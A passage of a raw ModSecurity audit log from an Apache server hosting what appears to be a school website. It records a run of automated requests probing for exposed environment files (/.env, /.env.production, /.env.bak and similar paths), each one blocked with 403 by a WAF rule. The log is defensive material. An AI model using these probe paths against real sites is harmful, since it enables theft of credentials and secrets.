"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905771163 857 (- - -) Stopwatch2: 1745151905771163 857; combined=338, p1=290, p2=0, p3=0, p4=0, p5=48, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --979fe60c-Z-- --d0c0865a-A-- [20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5gAAAMc 103.236.140.4 38406 103.236.140.4 8181 --d0c0865a-B-- GET /backend/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d0c0865a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0c0865a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905841660 805 (- - -) Stopwatch2: 1745151905841660 805; combined=288, p1=254, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0c0865a-Z-- --4f36eb72-A-- [20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr5wAAAMU 103.236.140.4 38408 103.236.140.4 8181 --4f36eb72-B-- GET /back/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4f36eb72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4f36eb72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905913190 540 (- - -) Stopwatch2: 1745151905913190 540; combined=208, p1=181, p2=0, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4f36eb72-Z-- --6972c744-A-- [20/Apr/2025:19:25:05 +0700] aATnoUAzeWrUIk0gvAsr6AAAAM0 103.236.140.4 38410 103.236.140.4 8181 --6972c744-B-- GET /download/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6972c744-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6972c744-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151905983496 616 (- - -) Stopwatch2: 1745151905983496 616; combined=238, p1=212, p2=0, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6972c744-Z-- --d672054a-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6QAAAMk 103.236.140.4 38412 103.236.140.4 8181 --d672054a-B-- GET /docker/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d672054a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d672054a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906053268 707 (- - -) Stopwatch2: 1745151906053268 707; combined=253, p1=215, p2=0, p3=0, p4=0, p5=37, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d672054a-Z-- --42db4724-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6gAAAME 103.236.140.4 38414 103.236.140.4 8181 --42db4724-B-- GET /cms/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --42db4724-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42db4724-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906123183 690 (- - -) Stopwatch2: 1745151906123183 690; combined=275, p1=247, p2=0, p3=0, p4=0, p5=28, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42db4724-Z-- --6486987e-A-- [20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TQAAAIc 103.236.140.4 38416 103.236.140.4 8181 --6486987e-B-- GET /content/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --6486987e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6486987e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906193753 785 (- - -) Stopwatch2: 1745151906193753 785; combined=316, p1=282, p2=0, p3=0, p4=0, p5=34, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6486987e-Z-- --8ed5dc2a-A-- [20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TgAAAIg 103.236.140.4 38418 103.236.140.4 8181 --8ed5dc2a-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8ed5dc2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ed5dc2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906264421 677 (- - -) Stopwatch2: 1745151906264421 677; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ed5dc2a-Z-- --ef4c7500-A-- [20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3QAAAEQ 103.236.140.4 38420 103.236.140.4 8181 --ef4c7500-B-- GET /user/.env.staging HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --ef4c7500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef4c7500-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906334739 712 (- - -) Stopwatch2: 1745151906334739 712; combined=273, p1=237, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef4c7500-Z-- --59c75770-A-- [20/Apr/2025:19:25:06 +0700] aATnolu16wJWB6g0mU8NrwAAABY 103.236.140.4 38422 103.236.140.4 8181 --59c75770-B-- GET /.env.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --59c75770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59c75770-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906411311 681 (- - -) Stopwatch2: 1745151906411311 681; combined=253, p1=221, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59c75770-Z-- --2eda176d-A-- [20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-TwAAAJY 103.236.140.4 38424 103.236.140.4 8181 --2eda176d-B-- GET /files/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --2eda176d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2eda176d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906481951 644 (- - -) Stopwatch2: 1745151906481951 644; combined=244, p1=212, p2=0, p3=0, p4=0, p5=32, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2eda176d-Z-- --dc17111c-A-- [20/Apr/2025:19:25:06 +0700] aATnosTCDeBrh52UaHS-UAAAAIw 103.236.140.4 38426 103.236.140.4 8181 --dc17111c-B-- GET /env/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --dc17111c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc17111c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906552154 698 (- - -) Stopwatch2: 1745151906552154 698; combined=280, p1=245, p2=0, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc17111c-Z-- --82207668-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr6wAAAMQ 103.236.140.4 38428 103.236.140.4 8181 --82207668-B-- GET /shared/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --82207668-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82207668-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906621887 690 (- - -) Stopwatch2: 1745151906621887 690; combined=270, p1=242, p2=0, p3=0, p4=0, p5=27, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --82207668-Z-- --4b153a18-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr7AAAAMw 103.236.140.4 38430 103.236.140.4 8181 --4b153a18-B-- GET /fedex/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --4b153a18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b153a18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906692153 688 (- - -) Stopwatch2: 1745151906692153 688; combined=287, p1=260, p2=0, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b153a18-Z-- --5cd01123-A-- [20/Apr/2025:19:25:06 +0700] aATnolu16wJWB6g0mU8NsQAAAAg 103.236.140.4 38436 103.236.140.4 8181 --5cd01123-B-- GET /.env.dist HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --5cd01123-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5cd01123-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906762181 687 (- - -) Stopwatch2: 1745151906762181 687; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5cd01123-Z-- --105e3d14-A-- [20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3gAAAEI 103.236.140.4 38438 103.236.140.4 8181 --105e3d14-B-- GET /rest/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --105e3d14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --105e3d14-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906832873 812 (- - -) Stopwatch2: 1745151906832873 812; combined=298, p1=259, p2=0, p3=0, p4=0, p5=38, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --105e3d14-Z-- --78cea856-A-- [20/Apr/2025:19:25:06 +0700] aATnokAzeWrUIk0gvAsr7QAAAMs 103.236.140.4 38440 103.236.140.4 8181 --78cea856-B-- GET /.env.project HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --78cea856-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78cea856-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906903674 702 (- - -) Stopwatch2: 1745151906903674 702; combined=259, p1=220, p2=0, p3=0, p4=0, p5=39, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78cea856-Z-- --03108a13-A-- [20/Apr/2025:19:25:06 +0700] aATnolTf0pL9EQC7JDUZ3wAAAEo 103.236.140.4 38442 103.236.140.4 8181 --03108a13-B-- GET /product/.env.staging HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --03108a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03108a13-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151906973489 567 (- - -) Stopwatch2: 1745151906973489 567; combined=216, p1=189, p2=0, p3=0, p4=0, p5=27, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03108a13-Z-- --cca53d76-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4AAAAFM 103.236.140.4 38444 103.236.140.4 8181 --cca53d76-B-- GET /_static/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --cca53d76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cca53d76-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907044452 652 (- - -) Stopwatch2: 1745151907044452 652; combined=254, p1=223, p2=0, p3=0, p4=0, p5=31, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cca53d76-Z-- --d8eb3529-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4QAAAEU 103.236.140.4 38446 103.236.140.4 8181 --d8eb3529-B-- GET /.env.www HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d8eb3529-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8eb3529-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907114685 674 (- - -) Stopwatch2: 1745151907114685 674; combined=256, p1=222, p2=0, p3=0, p4=0, p5=34, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8eb3529-Z-- --5f923d08-A-- [20/Apr/2025:19:25:07 